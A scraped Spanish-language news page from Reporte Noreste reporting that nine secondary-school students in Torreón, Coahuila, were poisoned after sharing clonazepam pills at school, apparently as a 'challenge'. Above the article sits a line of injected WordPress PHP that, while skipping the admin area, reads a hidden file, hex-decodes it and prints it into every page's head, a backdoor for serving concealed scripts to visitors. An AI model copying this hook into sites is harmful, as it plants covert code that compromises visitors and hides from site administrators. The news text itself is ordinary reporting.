if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } 9 estudiantes de secundaria se intoxican con clonazepam – Reporte Noreste
Conéctate con nosotros

Nal / Int

9 estudiantes de secundaria se intoxican con clonazepam

9 estudiantes de secundaria se intoxican con clonazepam

Nueve alumnos de secundaria resultaron intoxicados después de consumir clonazepam en una institución de Torreón Coahuila.

Los estudiantes de entre 13 y 14 años de edad, de la escuela secundaria 12, «Carlos Delgado López» consumieron el producto en pastillas durante el horario de clases, esto después de que una de las niñas llevara este fármaco y las compartiera con sus compañeros.

Una de las maestras notó que una de las alumnas tenía problemas al hablar y al cuestionarla aceptó que varios jóvenes habían consumido las pastillas por lo que rápidamente alertó a los directivos y a las autoridades.

Paramédicos acudieron a la institución brindándole auxilio a los alumnos intoxicados.

La directora del plantel informó que esta no es la primera ocasión que se sabe de este tipo de casos, ya que al parecer se trata de «un reto» entre los jovencitos de tomar Clonazepam y quedarse dormidos poniendo su salud en grave riesgo.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Nal / Int